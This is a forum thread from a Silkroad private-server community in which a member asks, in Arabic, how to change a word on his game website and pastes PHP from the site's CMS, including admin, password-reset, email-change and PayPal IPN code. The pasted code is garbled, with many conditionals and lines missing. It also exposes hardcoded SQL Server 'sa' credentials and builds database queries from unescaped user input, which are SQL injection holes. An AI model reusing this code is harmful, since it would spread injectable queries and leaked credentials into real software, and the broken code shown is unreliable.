قسم الاسئلة و الاستفسارات لعمل السيرفرات الخاصة [ قسم خاص لأسئلة واستفسارات عمل السيرفرات الخاصة ] [ يرجى الالتزام بقوانين قسم الأسئلة والاستفسارات ]
#1
• الانـتـسـاب » Dec 2015
• رقـم العـضـويـة » 128751
• المشـــاركـات » 111
• الـدولـة »
• الـهـوايـة » Silkroad4Arab [S4A] ツ
• اسـم الـسـيـرفـر » No Server
• الـجـنـس » Male
• نقـاط التقييم » 10
عاوز واحد يكون خبير فى الsite ويحللى المشكله دي
da al Home
كود PHP:
<a href="<?php echo $row [ link ]; ?> " class="span2"> <?php include ( "module/news.php" ); ?> <?php include ( "ftw.php" ); ?> <?php include ( "status.php" ); ?>
we da el Indix
كود PHP:
<?php require_once( 'config.inc.php' ); 'core/core.inc.php' ); $core ; $core = new core (); core :: $sql -> changeDB ( 'acc' ); ?> <!DOCTYPE html><?php echo $core -> aConfig [ 'Ttttttttttttttttttt' ]; ?> </title><?php $data = $core -> aConfig ; echo $data [ 'forumLink' ]; ?> " class="login-btn">Facebook</a></li><?php if(isset( $_SESSION [ 'username' ])) { $szAvatarUrl = user :: getUserAvatarUrl ( $_SESSION [ 'username' ]); ?> <li class="devider"> </li><?php echo $_SESSION [ 'username' ]; ?> </b><?php echo "[<font color='red' title='Your Silk'><b>" . user :: getSilkByUsername ( $_SESSION [ 'username' ]). "</b></font>]" ; ?> <img width="40" height="40" src='<?php echo $szAvatarUrl ; ?> '></img></a><?php } else { ?> <li class="devider"> </li><?php } if(isset( $_SESSION [ 'username' ])) { ?> <li class="devider"> </li><?php } else { ?> <li class="devider"> </li><?php } ?> </ul><?php if(isset( $_SESSION [ 'username' ])) { ?> <li><?php if(isset( $_SESSION [ 'username' ])) $core -> aConfig [ 'allowChangePw' ] == 1 ) echo "<li><a href='?pg=ucp&act=changepw'>Change password</a></li>" ; $core -> aConfig [ 'allowListChars' ] == 1 ) echo "<li><a href='?pg=ucp&act=mychars'>My characters</a></li>" ; $core -> aConfig [ 'allowMyProfile' ] == 1 ) echo "<li><a href='?pg=ucp&act=myprofile'>My profile</a></li>" ; $core -> aConfig [ 'allowRefferals' ] == 1 ) echo "<li><a href='?pg=ucp&act=refferals'>My refferals</a></li>" ; "<li><a href='?pg=emailreplace'>Change Email</a></li>" ; $core -> aConfig [ 'allowMailbox' ] == 1 ) "<li><a href='?pg=ucp&act=mailbox'>Mailbox " ; $myJID = user :: accountJIDbyUsername ( $_SESSION [ 'username' ]); $nMsgCountUnread = core :: $sql -> numRows ( "select * from srcms_privatemessages where receiver=' $myJID ' and viewed='0'" ); $nMsgCountRead = core :: $sql -> numRows ( "select * from srcms_privatemessages where receiver=' $myJID ' and viewed='1'" ); $nMsgCount = core :: $sql -> numRows ( "select * from srcms_privatemessages where receiver=' $myJID '" ); $msgText = "" ; $nMsgCountUnread > 0 ) $msgText = "[<b> $nMsgCount / " . $core -> aConfig [ 'maxPrivMsg' ]. "]</a></b>" ; $msgText = "[ $nMsgCount / " . $core -> aConfig [ 'maxPrivMsg' ]. "]</a></li>" ; " $msgText " ; ?> </ul><?php } user :: isAdmin ( $_SESSION [ 'username' ])) ?> <li><?php } ?> <li><a class="search"><i class="icon-search search-btn"></i></a></li> <?php $core -> showMainContent (); ?>
اغير انهي بقا علاشان تتغير الكلمه دى
عفوا ,,, لايمكنك مشاهده الروابط لانك غير مسجل لدينا
[ للتسجيل اضغط هنا ]
توقيع [KoTa]
:
*Marwan ツ
التعديل الأخير تم بواسطة [KoTa] ; 18-08-2016 الساعة 12:55 PM
إعلانات google
#2
• الانـتـسـاب » Dec 2010
• رقـم العـضـويـة » 77696
• المشـــاركـات » 1,134
• الـدولـة » Cairo
• الـهـوايـة » Developer Private Server
• اسـم الـسـيـرفـر » Private Server
• الـجـنـس » Male
• نقـاط التقييم » 33
رد: عاوز واحد يكون خبير فى الsite ويحللى المشكله دي
دور ف التيكستات الل عندك كلها هتلاقيها اكيد يعني هيا مش ف دول ممكن تكون ف ملف css ومعمول للملف stylesheet عادي يعني بس غالبا هتلاقيها ف ملف php عشان دي Status
توقيع محمد منتصر
:
#7
• الانـتـسـاب » Dec 2015
• رقـم العـضـويـة » 128751
• المشـــاركـات » 111
• الـدولـة »
• الـهـوايـة » Silkroad4Arab [S4A] ツ
• اسـم الـسـيـرفـر » No Server
• الـجـنـس » Male
• نقـاط التقييم » 10
رد: عاوز واحد يكون خبير فى الsite ويحللى المشكله دي
admin
كود PHP:
<?php = core :: $sql -> getRow ( "select whois from srcms_userprofiles where JID='" . user :: accountJIDbyUsername ( $_SESSION [ username ]). "'" ); $userRank != "admin" ) "NOT ADMIN" ; $_GET [ 'act' ]) 'news' ): $_GET [ 'subact' ])) ?> <!--=== Breadcrumbs ===--><?php } $_GET [ 'subact' ]) 'add' ): $_POST [ 'submit' ]) && !isset( $_POST [ 'title' ])) ?> <!--=== Breadcrumbs ===--><?php echo misc :: back (); ?> <input type="submit" name="submit" class="btn-u pull-right" value="Add"><?php } $szTitle = security :: toHTML ( $_POST [ 'title' ]); //$szText = misc::applyAttributesToText($_POST['textBox']); $szText = stripslashes ( security :: toHTML ( $_POST [ 'textBox' ])); core :: $sql -> exec ( "insert into srcms_news(title,content,author,time) values(' $szTitle ',' $szText ',' $_SESSION [ username ] ','" . misc :: getDateTime (). "')" ); ?> <!--=== Breadcrumbs ===--><?php echo "News article added.<br/>" ; misc :: redirect ( '?pg=admin&act=news' , 1 ); ?> </div><!--/row-fluid--><?php } 'del' ): $_GET [ 'id' ])) $nID = (int) $_GET [ 'id' ]; core :: $sql -> numRows ( "select * from srcms_news where id=' $nID '" ) > 0 ) core :: $sql -> exec ( "delete from srcms_news where id=' $nID '" ); core :: $sql -> exec ( "delete from srcms_newscomments where newsID=' $nID '" ); ?> <!--=== Breadcrumbs ===--><?php echo "News article deleted.<br/>" ; misc :: redirect ( '?pg=admin&act=news&subact=del' , 3 ); ?> </div><!--/row-fluid--><?php break; ?> <!--=== Breadcrumbs ===--><?php echo " You can't delete article that does not exist.<br/>" ; misc :: redirect ( '?pg=admin&act=news&subact=del' , 3 ); ?> </div><!--/row-fluid--><?php } $_POST [ 'submit' ]) && !isset( $_GET [ 'id' ])) ?> <!--=== Breadcrumbs ===--><?php $hNewsArticles = core :: $sql -> exec ( "select * from srcms_news" ); core :: $sql -> numRows ( "select * from srcms_news" ) == 0 ) ?> No news added yet<br/><?php } $row = mssql_fetch_array ( $hNewsArticles )) ?> <tr><?php echo $row [ id ]; ?> </td><?php echo $row [ title ]; ?> </td><?php echo $row [ author ]; ?> </td><?php echo $row [ time ]; ?> </td><?php echo misc :: back (); ?> <a href='?pg=admin&act=news&subact=del&id=<?php echo $row [ id ]; ?> ' class="btn-u">Delete</a><?php } ?> </table><?php } 'edit' ): $_POST [ 'submit' ]) && !isset( $_GET [ 'id' ])) ?> <!--=== Breadcrumbs ===--><?php $hNewsArticles = core :: $sql -> exec ( "select * from srcms_news" ); mssql_num_rows ( $hNewsArticles ) == 0 ) ?> No news added yet<br/><?php } $row = mssql_fetch_array ( $hNewsArticles )) ?> <tr><?php echo $row [ id ]; ?> </td><?php echo $row [ title ]; ?> </td><?php echo $row [ author ]; ?> </td><?php echo $row [ time ]; ?> </td><?php echo misc :: back (); ?> <a href='?pg=admin&act=news&subact=edit&id=<?php echo $row [ id ]; ?> ' class="btn-u">Edit</a></td><?php } ?> </table><?php } $nID = (int) $_GET [ 'id' ]; core :: $sql -> numRows ( "select * from srcms_news where id=' $nID '" ) == 0 ) ?> <!--=== Breadcrumbs ===--><?php echo " You can't edit article that does not exist.<br/>" ; misc :: redirect ( '?pg=admin&act=news&subact=del' , 3 ); ?> </div><!--/row-fluid--><?php } $_POST [ 'submit' ] != 'Save' ) $hArticleData = core :: $sql -> exec ( "select * from srcms_news where id=' $nID '" ); $hArticleData = mssql_fetch_array ( $hArticleData ); ?> <!--=== Breadcrumbs ===--><?php echo $hArticleData [ title ]; ?> )</h1><?php echo $hArticleData [ title ]; ?> )</h3><?php echo $hArticleData [ title ]; ?> "/><?php echo $hArticleData [ content ]; ?> </textarea><?php echo misc :: back (); ?> <input type="submit" name="submit" class="btn-u pull-right" value="Save"><?php } $szTitle = security :: toHTML ( $_POST [ 'title' ]); $szText = stripslashes ( security :: toHTML ( $_POST [ 'textBox' ])); core :: $sql -> exec ( "update srcms_news set title=' $szTitle ',content=' $szText ' where id=' $nID '" ); ?> <!--=== Breadcrumbs ===--><?php echo "News article edited.<br/>" ; misc :: redirect ( '?pg=admin&act=news&subact=edit' , 3 ); ?> </div><!--/row-fluid--><?php } "Unknown subaction" ; #echo "<br/>";misc::back(); } 'dl' ): $_GET [ 'subact' ])) ?> <!--=== Breadcrumbs ===--><?php } $_GET [ 'subact' ]) 'add' ): $_POST [ 'submit' ]) && !isset( $_POST [ 'link' ])) ?> <!--=== Breadcrumbs ===--><?php echo misc :: back (); ?> <input type="submit" name="submit" class="btn-u pull-right" value="Add"><?php } $szName = security :: toHTML ( $_POST [ 'name' ]); $szDesc = security :: toHTML ( $_POST [ 'description' ]); security :: isValidUrl ( $_POST [ 'link' ])) ?> <!--=== Breadcrumbs ===--><?php echo misc :: back (); ?> </div><!--/row-fluid--><?php break; core :: $sql -> exec ( "insert into srcms_downloads(name,link,description) values(' $szName ',' $_POST [ link ] ',' $szDesc ')" ); ?> <!--=== Breadcrumbs ===--><?php echo misc :: redirect ( '?pg=admin&act=dl' , 3 ); ?> </div><!--/row-fluid--><?php } 'del' ): $_POST [ 'submit' ]) && !isset( $_GET [ 'id' ])) ?> <!--=== Breadcrumbs ===--><?php $hLinkList = core :: $sql -> exec ( "select * from srcms_downloads" ); mssql_num_rows ( $hLinkList ) > 0 ) $row = mssql_fetch_array ( $hLinkList )) ?> <tr><?php echo $row [ id ]; ?> </td><?php echo $row [ name ]; ?> </td><?php echo $row [ link ]; ?> </td><?php echo $row [ description ]; ?> </td><?php echo misc :: back (); ?> <a href='?pg=admin&act=dl&subact=del&id=<?php echo $row [ id ]; ?> ' class="btn-u pull-right">Delete</a></td><?php } "No links added yet.<br/>" ; ?> </table><?php } $nID = (int) $_GET [ 'id' ]; core :: $sql -> numRows ( "select * from srcms_downloads where id=' $nID '" ) > 0 ) core :: $sql -> exec ( "delete from srcms_downloads where id=' $nID '" ); ?> <!--=== Breadcrumbs ===--><?php echo misc :: redirect ( '?pg=admin&act=dl' , 3 ); ?> </div><!--/row-fluid--><?php } ?> <!--=== Breadcrumbs ===--><?php echo misc :: redirect ( '?pg=admin&act=dl' , 3 ); ?> </div><!--/row-fluid--><?php } 'edit' ): $_POST [ 'submit' ]) && !isset( $_GET [ 'id' ])) ?> <!--=== Breadcrumbs ===--><?php $hLinks = core :: $sql -> exec ( "select * from srcms_downloads" ); mssql_num_rows ( $hLinks ) > 0 ) $row = mssql_fetch_array ( $hLinks )) ?> <tr><?php echo $row [ id ]; ?> </td><?php echo $row [ name ]; ?> </td><?php echo $row [ link ]; ?> </td><?php echo $row [ description ]; ?> </td><?php echo misc :: back (); ?> <a href='?pg=admin&act=dl&subact=edit&id=<?php echo $row [ id ]; ?> ' class="btn-u pull-right">Edit</td><?php } "No links added yet.<br/>" ; ?> </table><?php } $nID = (int) $_GET [ 'id' ]; $hLinkData = core :: $sql -> exec ( "select * from srcms_downloads where id=' $nID '" ); mssql_num_rows ( $hLinkData ) > 0 ) $_POST [ 'link' ])) $hArray = mssql_fetch_array ( $hLinkData ); ?> <!--=== Breadcrumbs ===--><?php echo $hArray [ name ]; ?> )</h3><?php echo $hArray [ name ]; ?> "/><?php echo $hArray [ link ]; ?> "/><?php echo $hArray [ description ]; ?> "/><?php echo misc :: back (); ?> <input type="submit" name="submit" class="btn-u pull-right" value="Save"><?php } security :: isValidUrl ( $_POST [ 'link' ])) ?> <!--=== Breadcrumbs ===--><?php echo misc :: back (); ?> </div><!--/row-fluid--><?php } $szName = misc :: toHTML ( $_POST [ 'name' ]); $szDesc = misc :: toHTML ( $_POST [ 'description' ]); core :: $sql -> exec ( "update srcms_downloads set name=' $szName ',description=' $szDesc ',link=' $_POST [ link ] ' where id=' $nID '" ); ?> <!--=== Breadcrumbs ===--><?php echo isc :: redirect ( '?pg=admin&act=dl' , 3 ); ?> </div><!--/row-fluid--><?php } ?> <!--=== Breadcrumbs ===--><?php echo misc :: back (); ?> </div><!--/row-fluid--><?php break; "Unknown subaction" ; break; #echo "<br/>"; } 'settings' ): $_POST [ 'submit' ] != 'Save' ) ?> <!--=== Breadcrumbs ===--><?php $hSettings = core :: $sql -> exec ( "select * from srcms_settings" ); $row = mssql_fetch_array ( $hSettings )) ?> <tr><?php echo $row [ valueName ]; ?> </td><?php echo $row [ valueName ]; ?> ' value='<?php echo $row [ value ]; ?> '><?php } ?> <tr><?php echo misc :: back (); ?> <input type="submit" name="submit" class="btn-u pull-right" value="Save"><?php } $_POST as $nElement => $nElementValue ) core :: $sql -> exec ( "update srcms_settings set value=' $nElementValue ' where valueName=' $nElement '" ); ?> <?php echo misc :: redirect ( '?pg=admin&act=settings' , 3 ); ?> </div><!--/row-fluid--><?php } 'epin' ): $_GET [ 'subact' ])) ?> <!--=== Breadcrumbs ===--><?php } $_GET [ 'subact' ]) 'gen' ): $_POST [ 'submit' ])) ?> <!--=== Breadcrumbs ===--><?php echo misc :: back (); ?> <input type="submit" name="submit" class="btn-u pull-right" value='Generate new epin'><?php } $nRandCode = rand ( 1000000000 , 2000000000 ); core :: $sql -> numRows ( "select * from srcms_epin where code=' $nRandCode '" ) == 0 ) $nSilk = (int) $_POST [ 'silkAmount' ]; core :: $sql -> exec ( "insert into srcms_epin(code,silkAmount) values(' $nRandCode ',' $nSilk ')" ); ?> <!--=== Breadcrumbs ===--><?php echo $nRandCode ; ?> </b><?php } ?> <!--=== Breadcrumbs ===--><?php echo misc :: back (); ?> </b><?php break; 'lookup' ): core :: $sql -> numRows ( "select * from srcms_epin" ) > 0 ) ?> <!--=== Breadcrumbs ===--><?php $hCodesData = core :: $sql -> exec ( "select * from srcms_epin" ); $row = mssql_fetch_array ( $hCodesData )) ?> <tr><?php echo $row [ code ]; ?> </b></td><?php echo $row [ silkAmount ]; ?> </b></td><?php } ?> </table><?php } ?> <!--=== Breadcrumbs ===--><?php } "Unknown subaction<br/>" ;break; #echo "<br/>"; } "Unknown action" ; ?>
cem
كود PHP:
<?php if(isset( $_GET [ 'uid' ])) security :: isSecureString ( $_GET [ 'uid' ], 3 )) $uid = $_GET [ 'uid' ]; core :: $sql -> numRows ( "select * from PW_Restore where RandomPASS = ' $uid '" ) == 0 ) 'this UID is incorrect or have been changed , request a new UID.' ; $_POST [ 'submit' ])) //process data if(! security :: isSecureString ( $_POST [ 'password_new' ], 3 )) $errors [] = "Password [new] contains forbidden symbols" ; strlen ( $_POST [ 'password_new' ]) > 32 ) $errors [] = "Password [new] too long" ; strlen ( $_POST [ 'password_new' ]) < 6 ) $errors [] = "Passwrod [new] too short" ; $_POST [ 'password_new' ] !== $_POST [ 'password_new_confirm' ]) $errors [] = "New Passwords does not match!." ; count ( $errors ) > 0 ) $errors as $nElement ) $nElement . ".<br/>" ; misc :: back (); //verify if( user :: RestorePass ( $_GET [ 'uid' ], $_POST [ 'password_new' ])) "Password changed successfully. <br/>" ; misc :: redirect ( '?pg=news' , 1 ); "Invalid old password specified.<br/>" ; misc :: back (); core :: $ucp -> ForgotpwForm (); 'Entry is invalid.' ; ?>
emailreplace
كود PHP:
<?php if (isset( $_POST [ 'replacemail1' ])) { security :: isSecureString ( $_SESSION [ 'username' ], 3 )) $errors [] = "Username field contains forbidden symbols" ; security :: isSecureString ( $_POST [ 'email' ], 2 )) $errors [] = "Email field contains forbidden symbols" ; security :: isCorrectEmail ( $_POST [ 'email' ])) $errors [] = "Invalid email address" ; count ( $errors ) > 0 ) $i = 0 ; $i < count ( $errors ); $i ++) $errors [ $i ]. ".<br/>" ; core :: $sql -> changeDB ( 'acc' ); $user = $_SESSION [ 'username' ]; $email = $_POST [ 'email' ]; $_SESSION [ 'username' ]) || empty( $_POST [ 'email' ])) { 'Error :' ; '<br />' ; "You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>" ; $_POST [ 'replacemail1' ]); $check = core :: $sql -> numRows ( "select Name from TB_User where StrUserID = ' $user ' and Email = ' $email '" ); $check !== 1 ) { 'Error :' ; '<br />' ; "User with following email/password doesn't exist! <a href = '?pg=forgot'>go back and try again!</a>" ; $_POST [ 'replacemail1' ]); $title = "Your Email Change Link!" ; $getrandom = misc :: genRandomString (); $datetime = gmDate ( 'Y-m-d H:i:s' ); $content = "HolySro Email Change Link : http://holysro.com/?pg=cem&uid= $getrandom \n Get inside to change your Email \n if you didnt request it , please ignore this mail.!" ; mail ( $email , "[HolySro Email Change] " . $title , $content . "\nEmail sent from: www.holysro.com" ); core :: $sql -> changeDB ( 'acc' ); $ZsCheck = core :: $sql -> numRows ( "select UserID from Email_Change where UserID = ' $user '" ); $ZsCheck == 1 ) { core :: $sql -> exec ( "update Email_Change set RandomPASS =' $getrandom ' ,createtime = ' $datetime ',ipaddr = ' $_SERVER [ REMOTE_ADDR ] ' where UserID = ' $user '" ); core :: $sql -> exec ( "insert into Email_Change(UserID,RandomPASS,createtime,ipaddr) values(' $user ',' $getrandom ',' $datetime ',' $_SERVER [ REMOTE_ADDR ] ')" ); "instructions to Email Change sent to your mailbox [ $email ] - please check your mailbox! <br /> In case you haven't received the email from us - check your spam folder! <br /><a href='?pg=index'>Return to main page</a>" ; $_POST [ 'replacemail1' ]); misc :: redirect ( "?pg=news" , 2 ); ?> <!--=== Breadcrumbs ===-->[email protected] " /><?php } ?>
forgotpw
كود PHP:
<?php global $core ; $_POST [ 'forgotpassword' ])) { security :: isSecureString ( $_POST [ 'username' ], 3 )) $errors [] = "Username field contains forbidden symbols" ; security :: isSecureString ( $_POST [ 'email' ], 2 )) $errors [] = "Email field contains forbidden symbols" ; security :: isCorrectEmail ( $_POST [ 'email' ])) $errors [] = "Invalid email address" ; count ( $errors ) > 0 ) $i = 0 ; $i < count ( $errors ); $i ++) $errors [ $i ]. ".<br/>" ; core :: $sql -> changeDB ( 'acc' ); $user = $_POST [ 'username' ]; $email = $_POST [ 'email' ]; $_POST [ 'username' ]) || empty( $_POST [ 'email' ])) { 'Error :' ; '<br />' ; "You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>" ; $_POST [ 'forgotpassword' ]); $check = core :: $sql -> numRows ( "select Name from TB_User where StrUserID = ' $user ' and Email = ' $email '" ); $check !== 1 ) { 'Error :' ; '<br />' ; "User with following email/password doesn't exist! <a href = '?pg=forgot'>go back and try again!</a>" ; $_POST [ 'forgotpassword' ]); $passw = core :: $sql -> exec ( "select Name from TB_User where StrUserID = ' $user ' and Email = ' $email '" ); $row = mssql_fetch_array ( $passw )) { $pass = $row [ 'Name' ]; $title = "Your password!" ; $getrandom = misc :: genRandomString (); $datetime = gmDate ( 'Y-m-d H:i:s' ); $getsiteurl = $_SERVER [ 'SERVER_NAME' ]; $servername = $core -> aConfig [ 'serverName' ]; $content = " $servername Password Reset Link : http:// $getsiteurl /?pg=cpw&uid= $getrandom \n Get inside to change your password \n if you didnt request it , please ignore this mail.!" ; mail ( $email , "[ $servername Password Recovery] " . $title , $content . "\nEmail sent from: $getsiteurl " ); core :: $sql -> changeDB ( 'acc' ); $ZsCheck = core :: $sql -> numRows ( "select UserID from PW_Restore where UserID = ' $user '" ); $ZsCheck == 1 ) { core :: $sql -> exec ( "update PW_Restore set RandomPASS =' $getrandom ' ,createtime = ' $datetime ',ipaddr = ' $_SERVER [ REMOTE_ADDR ] ' where UserID = ' $user '" ); core :: $sql -> exec ( "insert into PW_Restore(UserID,RandomPASS,createtime,ipaddr) values(' $user ',' $getrandom ',' $datetime ',' $_SERVER [ REMOTE_ADDR ] ')" ); ?> <!--=== Breadcrumbs ===--><?php echo $email ; ?> </code> ] - please check your mailbox! <br /> In case you haven't received the email from us - check your spam folder! <br /><a href='?pg=index'>Return to main page</a><?php unset( $_POST [ 'forgotpassword' ]); ?> <?php } ?> [email protected] "><?php } ?>
forums
كود PHP:
<?php global $core ; "Redirecting..." ; misc :: redirect ( $core -> aConfig [ 'forumLink' ], 2 ); ?>
ipn
كود PHP:
<?php = mssql_connect ( 'WIN-58LMRAF4MSQ\SQLEXPRESS' , 'sa' , 'hkjhldkdhq@012012' ) // Edit to your Settings (SQL,ID,PW) . or die( 'Could not connect to the server!' ); // Select a database: mssql_select_db ( 'SRO_VT_ACCOUNT_Tito' ) // Edit to you Account Database!! . or die( 'Could not select a database.' ); $ppEmail = '[email protected] ' ; // Edit This Email to your Paypal!!! . $personalEmail = '[email protected] ' ; // Edit This Email to your Paypal!!! . $amountUsd = array( '5.00' , '10.00' , '15.00' , '25.00' , '50.00' ); // Edit The Price Here ! (must be double (XX.XX)!) . $usdToSilks = array( 5 => 300 , 10 => 700 , 15 => 1100 , 25 => 2000 , 50 => 4500 ); // Edit Silks From Price 10=>500 [10$ = 500 Silk] . ini_set ( 'log_errors' , true ); ini_set ( 'error_log' , dirname ( __FILE__ ). '/ipn_errors.log' ); // intantiate the IPN listener include( 'ipnlistener.php' ); $listener = new IpnListener (); // tell the IPN listener to use the PayPal test sandbox $listener -> use_sandbox = false ; // try to process the IPN POST try { $listener -> requirePostMethod (); $verified = $listener -> processIpn (); Exception $e ) { error_log ( $e -> getMessage ()); 0 ); $verified ) { $errmsg = '' ; // stores errors from fraud checks if ( $_POST [ 'payment_status' ] != 'Completed' ) { // simply ignore any IPN that is not completed exit( 0 ); // Make sure seller email matches your primary account email. if ( $_POST [ 'receiver_email' ] != $ppEmail ) { $errmsg .= "'receiver_email' does not match: " ; $errmsg .= $_POST [ 'receiver_email' ]. "\n" ; //checks currency if ( $_POST [ 'mc_currency' ] != 'USD' ) { $errmsg .= "'mc_currency' does not match: " ; $errmsg .= $_POST [ 'mc_currency' ]. "\n" ; // Make sure the amount(s) paid match if ( $_POST [ 'mc_currency' ] = 'USD' ) { in_array ( $_POST [ 'mc_gross' ], $amountUsd )) { $errmsg .= "'mc_gross' does not match: " ; $errmsg .= $_POST [ 'mc_gross' ]. "\n" ; /* if ($_POST['mc_currency'] = 'EUR') { $txn_id = ms_escape_string ( $_POST [ 'txn_id' ]); $sql = "SELECT * FROM paypal WHERE txn_id = ' $txn_id '" ; $r = mssql_query ( $sql ); $r ) { error_log ( mysql_error ()); 0 ); // $exists = mssql_query($r, 0); $exists = mssql_num_rows ( $r ); mssql_free_result ( $r ); $exists <> 0 ) { $errmsg .= "'txn_id' has already been processed: " . $_POST [ 'txn_id' ]. "\n" ; $errmsg )) { // manually investigate errors from the fraud checking $body = "IPN failed fraud checks: \n $errmsg \n\n" ; $body .= $listener -> getTextReport (); mail ( $personalEmail , 'Paypal Buyer Notice!' , $body ); error_log ( $body ); exit( 0 ); $payer_email = ms_escape_string ( $_POST [ 'payer_email' ]); $mc_gross = ms_escape_string ( $_POST [ 'mc_gross' ]); $username = ms_escape_string ( $_POST [ 'custom' ]); $timenow = date ( "y-m-d H:i:s" , time ()); $sql = "INSERT INTO paypal (txn_id,payer_email,mc_gross,username,date)VALUES $txn_id ', ' $payer_email ', $mc_gross , ' $username ', ' $timenow ')" ; // Add A logs of buys for server owner [Naty48] . if (! mssql_query ( $sql )) { error_log ( mysql_error ()); 0 ); //silk update [NATY48] $silkAmount = $usdToSilks [(int) $mc_gross ]; mssql_query ( "exec CGI.CGI_WebPurchaseSilk 0,' $username ',0, $silkAmount ,0" ); // will execute automated in game update of silks. } // manually investigate the invalid IPN . } ms_escape_string ( $data ) { $data ) or empty( $data ) ) return '' ; is_numeric ( $data ) ) return $data ; $non_displayables = array( '/%0[0-8bcef]/' , // url encoded 00-08, 11, 12, 14, 15 '/%1[0-9a-f]/' , // url encoded 16-31 '/[\x00-\x08]/' , // 00-08 '/\x0b/' , // 11 '/\x0c/' , // 12 '/[\x0e-\x1f]/' // 14-31 ); $non_displayables as $regex ) $data = preg_replace ( $regex , '' , $data ); $data = str_replace ( "'" , "''" , $data ); $data ; ?>
ipnlistener
كود PHP:
<?php class IpnListener { $use_curl = true ; $force_ssl_v3 = false ; /** public $use_ssl = true ; /** public $use_sandbox = false ; /** public $timeout = 30 ; $post_data = array(); $post_uri = '' ; $response_status = '' ; $response = '' ; PAYPAL_HOST = 'www.paypal.com' ; SANDBOX_HOST = 'www.sandbox.paypal.com' ; /** protected function curlPost ( $encoded_data ) { $this -> use_ssl ) { $uri = 'https://' . $this -> getPaypalHost (). '/cgi-bin/webscr' ; $this -> post_uri = $uri ; $uri = 'http://' . $this -> getPaypalHost (). '/cgi-bin/webscr' ; $this -> post_uri = $uri ; $ch = curl_init (); curl_setopt ( $ch , CURLOPT_URL , $uri ); curl_setopt ( $ch , CURLOPT_POST , true ); curl_setopt ( $ch , CURLOPT_POSTFIELDS , $encoded_data ); curl_setopt ( $ch , CURLOPT_FOLLOWLOCATION , true ); curl_setopt ( $ch , CURLOPT_TIMEOUT , $this -> timeout ); curl_setopt ( $ch , CURLOPT_RETURNTRANSFER , true ); curl_setopt ( $ch , CURLOPT_HEADER , true ); $this -> force_ssl_v3 ) { curl_setopt ( $ch , CURLOPT_SSLVERSION , 3 ); curl_setopt ( $ch , CURLOPT_SSL_VERIFYPEER , false ); $this -> response = curl_exec ( $ch ); $this -> response_status = strval ( curl_getinfo ( $ch , CURLINFO_HTTP_CODE )); $this -> response === false || $this -> response_status == '0' ) { $errno = curl_errno ( $ch ); $errstr = curl_error ( $ch ); Exception ( "cURL error: [ $errno ] $errstr " ); /** protected function fsockPost ( $encoded_data ) { $this -> use_ssl ) { $uri = 'ssl://' . $this -> getPaypalHost (); $port = '443' ; $this -> post_uri = $uri . '/cgi-bin/webscr' ; $uri = $this -> getPaypalHost (); // no "http://" in call to fsockopen() $port = '80' ; $this -> post_uri = 'http://' . $uri . '/cgi-bin/webscr' ; $fp = fsockopen ( $uri , $port , $errno , $errstr , $this -> timeout ); $fp ) { // fsockopen error throw new Exception ( "fsockopen error: [ $errno ] $errstr " ); $header .= "POST /cgi-bin/webscr HTTP/1.0\r\n" ; $header .= "Content-Type: application/x-www-form-urlencoded\r\n" ; $header .= "Content-Length: " . strlen ( $encoded_data ). "\r\n" ; $header .= "Connection: Close\r\n\r\n" ; fputs ( $fp , $header . $encoded_data . "\r\n\r\n" ); feof ( $fp )) { $this -> response )) { // extract HTTP status from first line $this -> response .= $status = fgets ( $fp , 1024 ); $this -> response_status = trim ( substr ( $status , 9 , 4 )); $this -> response .= fgets ( $fp , 1024 ); fclose ( $fp ); getPaypalHost () { $this -> use_sandbox ) return IpnListener :: SANDBOX_HOST ; IpnListener :: PAYPAL_HOST ; /** public function getPostUri () { $this -> post_uri ; /** public function getResponse () { $this -> response ; /** public function getResponseStatus () { $this -> response_status ; /** public function getTextReport () { $r = '' ; // date and POST url for ( $i = 0 ; $i < 80 ; $i ++) { $r .= '-' ; } $r .= "\n[" . date ( 'm/d/Y g:i A' ). '] - ' . $this -> getPostUri (); $this -> use_curl ) $r .= " (curl)\n" ; $r .= " (fsockopen)\n" ; // HTTP Response for ( $i = 0 ; $i < 80 ; $i ++) { $r .= '-' ; } $r .= "\n { $this -> getResponse ()} \n" ; // POST vars for ( $i = 0 ; $i < 80 ; $i ++) { $r .= '-' ; } $r .= "\n" ; $this -> post_data as $key => $value ) { $r .= str_pad ( $key , 25 ). " $value \n" ; $r .= "\n\n" ; $r ; /** public function processIpn ( $post_data = null ) { $encoded_data = 'cmd=_notify-validate' ; $post_data === null ) { // use raw POST data if (!empty( $_POST )) { $this -> post_data = $_POST ; $encoded_data .= '&' . file_get_contents ( 'php://input' ); Exception ( "No POST data found." ); // use provided data array $this -> post_data = $post_data ; $this -> post_data as $key => $value ) { $encoded_data .= "& $key =" . urlencode ( $value ); $this -> use_curl ) $this -> curlPost ( $encoded_data ); $this -> fsockPost ( $encoded_data ); strpos ( $this -> response_status , '200' ) === false ) { Exception ( "Invalid response status: " . $this -> response_status ); strpos ( $this -> response , "VERIFIED" ) !== false ) { true ; strpos ( $this -> response , "INVALID" ) !== false ) { false ; Exception ( "Unexpected response from PayPal." ); /** public function requirePostMethod () { // require POST requests if ( $_SERVER [ 'REQUEST_METHOD' ] && $_SERVER [ 'REQUEST_METHOD' ] != 'POST' ) { header ( 'Allow: POST' , true , 405 ); Exception ( "Invalid HTTP request method." ); ?>
news
كود PHP:
<?php global $core ; $_GET [ 'del' ])) $nCommentID = (int) $_GET [ 'del' ]; $isAdmin = core :: $sql -> getRow ( "select whois from srcms_userprofiles where JID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "'" ); core :: $sql -> numRows ( "select * from srcms_newscomments where id=' $nCommentID ' and author=' $_SESSION [ username ] '" ) > 0 || $isAdmin == "admin" ) core :: $sql -> exec ( "delete from srcms_newscomments where id=' $nCommentID '" ); misc :: redirect ( "?pg=news&comment= $_GET [ backid ] " , 0 ); "<br/><br/>You can't delete comment that does not belong to you." ; $_GET [ 'comment' ])) $hQuery = core :: $sql -> exec ( "select * from srcms_news order by id desc" ); ?> <?php while( $row = mssql_fetch_array ( $hQuery )) $nComments = core :: $sql -> numRows ( "select * from srcms_newscomments where newsID=' $row [ id ] '" ); $szAvatarUrl = user :: getUserAvatarUrl ( $row [ 'author' ]); $dateee = gmDate ( 'Y-m-d H:i:s' ); $nComments = core :: $sql -> getRow ( "select count(*) from srcms_newscomments where newsID=' $row [ id ] '" ); $userRank = core :: $sql -> getRow ( "select whois from srcms_userprofiles where JID='" . user :: accountJIDbyUsername ( $row [ 'author' ]). "'" ); $szUserRank = user :: getRankText ( $userRank ); $row [ 'content' ] = security :: fromHTML ( $row 